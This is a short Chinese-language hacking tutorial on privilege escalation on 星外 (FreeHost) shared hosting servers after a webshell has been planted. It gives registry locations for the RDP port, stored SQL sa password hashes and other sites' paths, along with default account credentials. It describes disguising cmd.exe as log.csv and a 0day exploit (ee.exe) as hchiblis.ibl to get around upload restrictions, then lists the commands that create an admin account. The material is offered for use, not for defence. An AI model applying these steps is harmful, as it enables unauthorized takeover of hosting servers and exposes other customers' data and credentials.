通过注册表找远程端口:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
——————————————————————————————————————————————————
星外 找不到可读可写目录 提权服务器
拒绝访问。
星外提权就是找可读可写目录
才有可能找到可执行目录
上传了cmd了 之前
C:\windows\temp\Cookies\CMD.EXE
拒绝访问。
找遍了 目录没有找到可执行的目录
这个时候可以试这找 log日记
先说两个要点
这个是星外的服务器 一看就可以知道
d:\freehost\
可以尝试星外默认帐号密码登录服务器
星外默认帐号密码
freehostrunat
fa41328538d7be36e83ae91a78a1b16f!7
2找星外的sa密码保存处 经常破不出 就算破出来了经常连不上
HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\11
sa密码 ab9b161c79fbea5e44c1c78ec4821f96
找另一个泄漏 其他网站的物理路径的注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\
这个有时候自然有用的
自己看下吧 对自己提权服务器有帮助的
还有一个度注册表 获取mysql的路径 如果服务器开了3306端口可以
考虑下载mysql的root密码 也可以在asp大马的 程序 位置下载快捷方式获得路径
HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\
对路径“E:\Program Files\MySQL\MySQL Server 5.0”的访问被拒绝。
说道这里 现在继续说
目录没有找到可执行的目录 提权服务器
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\
这个目录虽说没有
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\ 可以读 不可写
是不可以上传文件的 但我们可以尝试上传log.csv 覆盖 这个是可以的
将cmd改名为 log.csv上传是可以上传上去的
这个log.csv是我改名的cmd上传覆盖掉原先的 log.csv
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
这样可以执行cmd了
但是无法执行我们的提权exp
所以继续找log日记
hchiblis.ibl 这个和前面一样
将提权的exp 我用的星外 oday ee.exe
是可以覆盖上传的
hchiblis.ibl 2012-06-29 05:27:49 10.00
星外的ee.exe下载地址
/c c://windows/hchiblis.ibl
c://windows/hchiblis.ibl -i
/c c://windows/hchiblis.ibl -u 724
UserName:freehostrunat
Password:1a1b076a19155ffdc86365fa95bcfbba!7
成功提权